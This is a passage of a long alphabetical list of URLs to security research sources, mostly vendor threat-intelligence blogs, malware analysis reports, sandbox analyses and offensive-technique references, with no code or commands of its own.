rocess-without-mimikatz\nhttps://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration\nhttps://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing\nhttps://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement\nhttps://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll\nhttps://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2\nhttp
s://www.joesandbox.com/analysis/443736/0/html\nhttps://www.joesandbox.com/analysis/465533/0/html\nhttps://www.joesandbox.com/analysis/476188/1/iochtml\nhttps://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D\nhttps://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04\nhttps://www.joesandbox.com/analysis/790122/0/html\nhttps://www.joeware.net/freetools/tools/adfind/\nhttps://www.jpcert.or.jp/english/pub/sr/ir_research.html\nhttps://www.justice.gov/file/1080281/download\nhttps://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources\nhttps://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/\nhttps://www.kernel.org/doc/html/v5.0/trace/kprobetrace.html\nhttps://www.kroll.com/en/insights/publications/cyber/microsoft-teams-used-as-initial-access-for-darkgate-malware\nhttps://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone\nhttps://www.lexjansen.com/sesug/1993/SESUG93035.pdf\nhttps://www.linkedin.com/feed/update/urn:li:activity:7047435754834198529/\nhttps://www.linkedin.com/feed/update/urn:li:activity:7282295814792605698/\nhttps://www.linkedin.com/posts/kleiton-kurti_github-kleiton0x00redditc2-abusing-reddit-activity-7009939662462984192-5DbI/?originalSubdomain=al\nhttps://www.linkedin.com/pulse/exploit-available-dangerous-ms-office-rce-vuln-called-thebenygreen-\nhttps://www.linkedin.com/pulse/guntior-story-advanced-bootkit-doesnt-rely-windows-disk-baranov-wue8e/\nhttps://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/\nhttps://www.localpotato.com/\nhttps://www.localpotato.com/localpotato_html/LocalPotato.html\nhttps://www.logpoint.com/en/blog/detecting-privilege-escalation-zero-day-cve-2021-41379/\nhttps://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/\nhttps://www.logpoint.com/en/blog/detecting-zerologon-vulnerability-in-logpoint/\nhttps://www.logpoint.com/en/blog/shenanigans-of-scheduled-tasks/\nhttps://www.loob
ins.io/binaries/hdiutil/\nhttps://www.loobins.io/binaries/launchctl/\nhttps://www.loobins.io/binaries/sysctl/#\nhttps://www.loobins.io/binaries/tmutil/\nhttps://www.lunasec.io/docs/blog/log4j-zero-day/\nhttps://www.makeuseof.com/how-to-install-and-use-doas/\nhttps://www.malwarebytes.com/blog/detections/pum-optional-nodispbackgroundpage\nhttps://www.malwarebytes.com/blog/detections/pum-optional-nodispcpl\nhttps://www.malwarebytes.com/blog/detections/pup-optional-onelaunch-silentcf\nhttps://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method\nhttps://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html\nhttps://www.manageengine.com/products/desktop-central/os-imaging-deployment/media-is-write-protected.html\nhttps://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html\nhttps://www.mandiant.com/resources/blog/accellion-fta-exploited-for-data-theft-and-extortion\nhttps://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally\nhttps://www.mandiant.com/resources/blog/fin7-shim-databases-persistence\nhttps://www.mandiant.com/resources/blog/infected-usb-steal-secrets\nhttps://www.mandiant.com/resources/blog/iranian-threat-group-updates-ttps-in-spear-phishing-campaign\nhttps://www.mandiant.com/resources/blog/lnk-between-browsers\nhttps://www.mandiant.com/resources/blog/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign\nhttps://www.mandiant.com/resources/blog/obfuscation-wild-targeted-attackers-lead-way-evasion-techniques\nhttps://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit\nhttps://www.mandiant.com/resources/blog/triton-actor-ttp-profile-custom-attack-tools-detections\nhttps://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government\nhttps://www.mandiant.com/resources/blog/ukraine-and-sandworm-team\nhttps://www.mandiant.com/resources/blog/wannacry-ransomware-campaign\nhttps://www.mandia
nt.com/resources/blog/zero-day-moveit-data-theft\nhttps://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling\nhttps://www.mandiant.com/resources/evolution-of-fin7\nhttps://www.mandiant.com/resources/russian-targeting-gov-business\nhttps://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents\nhttps://www.mandiant.com/resources/telegram-malware-iranian-espionage\nhttps://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions\nhttps://www.manpagez.com/man/8/firmwarepasswd/\nhttps://www.manpagez.com/man/8/PlistBuddy/\nhttps://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/\nhttps://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/\nhttps://www.mdeditor.tw/pl/pgRt\nhttps://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/\nhttps://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/\nhttps://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/\nhttps://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/\nhttps://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/\nhttps://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/\nhttps://www.microsoft.com/en-us/security/blog/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/\nhttps://www.microsoft.com/en-us/security/blog/2020/03/23/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable/\nhttps://www.microsoft.com/en-us/security/blog/2021/10/26/protect-your-business-from-password-sprays-with-microsoft-dart-recommendations/\nhttps://www.microsoft.com/en-us/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/\nhttps://www.microsoft.com/en-us/security/blog/2022/10/18/
defenders-beware-a-case-for-post-ransomware-investigations/\nhttps://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/\nhttps://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/\nhttps://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/\nhttps://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/\nhttps://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/\nhttps://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/\nhttps://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/\nhttps://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/\nhttps://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/\nhttps://www.microsoft.com/en-us/security/blog/2024/10/29/midnight-blizzard-conducts-large-scale-spear-phishing-campaign-using-rdp-files/\nhttps://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/03/Figure-7-sample-webdav-process-create-event.png\nhttps://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A\nhttps://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/\nhttps://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-publi
c-sector-by-unidentified-attackers/\nhttps://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/\nhttps://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/\nhttps://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/\nhttps://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\nhttps://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/\nhttps://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/\nhttps://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/\nhttps://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/\nhttps://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/\nhttps://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/\nhttps://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/\nhttps://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/\nhttps://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/\nhttps://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/\nhttps://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/\nhttps://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations\nhttps://www.microsoft.com/security/blog/2022/03/22/d
ev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/\nhttps://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/\nhttps://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/\nhttps://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/\nhttps://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/\nhttps://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/\nhttps://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea)\nhttps://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/\nhttps://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/\nhttps://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/\nhttps://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/\nhttps://www.mitiga.io/blog/how-okta-passwords-can-be-compromised-uncovering-a-risk-to-user-data\nhttps://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan\nhttps://www.myantispyware.com/2020/12/14/how-to-uninstall-onelaunch-browser-removal-guide/\nhttps://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/\nhttps://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/\nhttps://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/\nhttps://www.ncsc.gov.uk/static-assets/documents
/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf\nhttps://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf\nhttps://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf\nhttps://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf\nhttps://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS\nhttps://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/\nhttps://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/\nhttps://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/\nhttps://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/\nhttps://www.nextron-systems.com/?s=antivirus\nhttps://www.nirsoft.net/utils/nircmd.html\nhttps://www.nirsoft.net/utils/nircmd2.html#using\nhttps://www.offensive-security.com/metasploit-unleashed/timestomp/\nhttps://www.openwall.com/lists/oss-security/2019/10/14/1\nhttps://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf\nhttps://www.packetlabs.net/posts/clipboard-data-security/\nhttps://www.packetlabs.net/posts/scattered-spider-is-a-young-ransomware-gang-exploiting-large-corporations/\nhttps://www.packetmischief.ca/2023/07/31/amazon-ec2-credential-exfiltration-how-it-happens-and-how-to-mitigate-it/#lifting-credentials-from-imds-this-is-why-we-cant-have-nice-things\nhttps://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/\nhttps://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf\nhttps://www.papercut.com/kb/Main/PO-1216-and-PO-1219\nhttps://www.passcape.com/windows_password_recovery_dpapi_credhist\nhttps://www.pcisecuritystandards.org/
documents/PCI_DSS_v3-2-1.pdf\nhttps://www.pdq.com/pdq-deploy/\nhttps://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation\nhttps://www.php.net/manual/en/features.commandline.php\nhttps://www.phpied.com/make-your-javascript-a-windows-exe/\nhttps://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks\nhttps://www.pingcastle.com/documentation/scanner/\nhttps://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html\nhttps://www.poolwatch.io/coin/monero\nhttps://www.poweradmin.com/paexec/\nhttps://www.powershellgallery.com/packages/DSInternals\nhttps://www.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation/?edition=2019\nhttps://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/\nhttps://www.proofpoint.com/us/blog/threat-insight/part-1-socgholish-very-real-threat-very-fake-update\nhttps://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain\nhttps://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new\nhttps://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages\nhttps://www.protect.airbus.com/blog/uncovering-cyber-intruders-netscan/\nhttps://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/\nhttps://www.publicnow.com/view/EB87DB49C654D9B63995FAD4C9DE3D3CC4F6C3ED?1671634841\nhttps://www.pureid.io/dumping-abusing-windows-credentials-part-1/\nhttps://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html\nhttps://www.pwndefend.com/2021/02/15/retrieving-passwords-
from-veeam-backup-servers/\nhttps://www.pwndefend.com/2023/03/15/the-long-game-persistent-hash-theft/\nhttps://www.py2exe.org/\nhttps://www.python.org/dev/peps/pep-0249/#exceptions\nhttps://www.qemu.org/docs/master/system/invocation.html#hxtool-5\nhttps://www.qualys.com/2021/05/04/21nails/21nails.txt\nhttps://www.qurium.org/alerts/targeted-malware-against-crph/\nhttps://www.radmin.fr/\nhttps://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/\nhttps://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection\nhttps://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/\nhttps://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/\nhttps://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/\nhttps://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/\nhttps://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/\nhttps://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/\nhttps://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/\nhttps://www.rapid7.com/blog/post/2023/01/19/etr-exploitation-of-control-web-panel-cve-2022-44877/\nhttps://www.rapid7.com/blog/post/2023/02/07/etr-cve-2022-21587-rapid7-observed-exploitation-of-oracle-e-business-suite-vulnerability/\nhttps://www.rapid7.com/blog/post/2023/06/01/rapid7-observed-exploitation-of-critical-moveit-transfer-vulnerability/\nhttps://www.rapid7.com/blog/post/2023/10/25/etr-cve-2023-4966-exploitation-of-citrix-netscaler-information-disclosure-vulnerability/\nhttps://www.rarlab.com/vuln_rev3_names.html\nhttps://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/\nhttps://www.reddit.com/r/crowdstrike/comments/125r3uu/20230
329_situational_awareness_crowdstrike/\nhttps://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/\nhttps://www.reddit.com/r/sysadmin/comments/13wxuej/comment/jmhdg55/\nhttps://www.redhat.com/en/blog/protecting-kubernetes-against-mitre-attck-persistence#technique-33-kubernetes-cronjob\nhttps://www.remoteutilities.com/support/kb/host-service-won-t-start/\nhttps://www.revshells.com/\nhttps://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/november/APT29%20attacks%20Embassies%20using%20CVE-2023-38831%20-%20report%20en.pdf\nhttps://www.roboform.com/\nhttps://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/\nhttps://www.sans.edu/cyber-research/from-crash-compromise-unlocking-potential-windows-crash-dumps-offensive-security/\nhttps://www.sans.org/blog/defending-against-scattered-spider-and-the-com-with-cybercrime-intelligence/\nhttps://www.sans.org/blog/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly/\nhttps://www.sans.org/blog/red-team-tactics-hiding-windows-services/\nhttps://www.sans.org/blog/wmic-for-incident-response/\nhttps://www.sans.org/cyber-security-summit/archives\nhttps://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492186586.pdf\nhttps://www.sans.org/webcasts/119395\nhttps://www.sans.org/webcasts/tech-tuesday-workshop-cobalt-strike-detection-log-analysis-119395\nhttps://www.scythe.io/library/threat-emulation-qakbot\nhttps://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/\nhttps://www.secura.com/blog/zero-logon\nhttps://www.secureworks.com/blog/ransomware-as-a-distraction\nhttps://www.secureworks.com/research/bronze-butler-targets-japanese-businesses\nhttps://www.secureworks.com/research/shadowpad-malware-analysis\nhttps://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/\nhttps://www.securitynewspaper.com/2017/03/20/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/\
nhttps://www.securonix.com/blog/cve-2022-26809-remote-procedure-call-runtime-remote-code-execution-vulnerability-and-coverage/\nhttps://www.securonix.com/blog/detecting-microsoft-msdt-dogwalk/\nhttps://www.securonix.com/blog/seolurker-attack-campaign-uses-seo-poisoning-fake-google-ads-to-install-malware/\nhttps://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/\nhttps://www.sentinelone.com/blog/detecting-dsrm-account-misconfigurations/\nhttps://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/\nhttps://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool\nhttps://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/\nhttps://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/\nhttps://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/\nhttps://www.sentinelone.com/labs/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/\nhttps://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/\nhttps://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/\nhttps://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/\nhttps://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/\nhttps://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/\nhttps://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/\nhttps://www.sentinelone.com/labs/wip26-espionage-threat-actors-abuse-cloud-infrastructure-in-targeted-telco-attacks/\nhttps://www.sentinelone.com/wp-content/uploads/pdf-gen/1630910064/20-common-tools-techniques-used-by
-macos-threat-actors-malware.pdf\nhttps://www.shellhacks.com/clear-history-powershell/\nhttps://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\nhttps://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors\nhttps://www.slipstick.com/developer/custom-form/clean-outlooks-forms-cache/\nhttps://www.snip2code.com/Snippet/4397378/UAC-bypass-using-EditionUpgradeManager-C/\nhttps://www.socinvestigation.com/most-common-windows-event-ids-to-hunt-mind-map/\nhttps://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml\nhttps://www.softwaretestinghelp.com/how-to-use-ngrok/\nhttps://www.spamhaus.org/reputation-statistics/cctlds/domains/\nhttps://www.spamhaus.org/statistics/tlds/\nhttps://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf\nhttps://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf\nhttps://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html\nhttps://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html\nhttps://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html\nhttps://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html\nhttps://www.splunk.com/en_us/blog/security/inno-setup-malware-redline-stealer-campaign.html\nhttps://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return\nhttps://www.swascan.com/cactus-ransomware-malware-analysis/\nhttps://www.sygnia.co/golden-saml-advisory\nhttps://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets\nhttps://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap\nhttps://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html\nhttps://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notifi
cation\nhttps://www.tanium.com/blog/apt41-deploys-google-gc2-for-attacks-cyber-threat-intelligence-roundup/\nhttps://www.tarasco.org/security/pwdump_7/\nhttps://www.tarlogic.com/blog/cve-2023-27363-foxit-reader/\nhttps://www.teamviewer.com/en-us/\nhttps://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/\nhttps://www.tecmint.com/different-types-of-linux-shells/\nhttps://www.tenable.com/blog/cve-2021-22005-critical-file-upload-vulnerability-in-vmware-vcenter-server\nhttps://www.tenable.com/security/research/tra-2021-13\nhttps://www.tenable.com/security/research/tra-2023-11\nhttps://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html\nhttps://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html\nhttps://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html\nhttps://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html\nhttps://www.thestack.technology/security-experts-call-for-incident-response-exercises-after-mass-cisco-device-exploitation/\nhttps://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html\nhttps://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html\nhttps://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg\nhttps://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html\nhttps://www.trendmicro.com/en_no/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html\nhttps://www.trendmicro.com/en_ph/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html\nhttps://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-ema
ils-set-sights-on-russian-speaking-businesses.html\nhttps://www.trendmicro.com/en_us/research/18/d/new-macos-backdoor-linked-to-oceanlotus-found.html\nhttps://www.trendmicro.com/en_us/research/19/i/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell.html\nhttps://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html\nhttps://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html\nhttps://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html\nhttps://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html\nhttps://www.trendmicro.com/en_us/research/22/d/spring4shell-exploited-to-deploy-cryptocurrency-miners.html\nhttps://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html\nhttps://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html\nhttps://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html\nhttps://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html\nhttps://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html\nhttps://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html\nhttps://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html\nhttps://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html\nhttps://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html\nhttps://www.trendmicro.com/en_us/research/23/c/earth-preta-updated-stealthy-strategies.html\nhttps://www.trendmicro.com/en_us/
research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html\nhttps://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html\nhttps://www.trendmicro.com/en_us/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html\nhttps://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html\nhttps://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html\nhttps://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html\nhttps://www.trendmicro.com/en_us/research/24/c/cve-2024-21412--darkgate-operators-exploit-microsoft-windows-sma.html\nhttps://www.trendmicro.com/en_us/research/25/c/socgholishs-intrusion-techniques-facilitate-distribution-of-rans.html\nhttps://www.trendmicro.com/en_za/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html\nhttps://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html\nhttps://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore\nhttps://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks\nhttps://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore\nhttps://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-a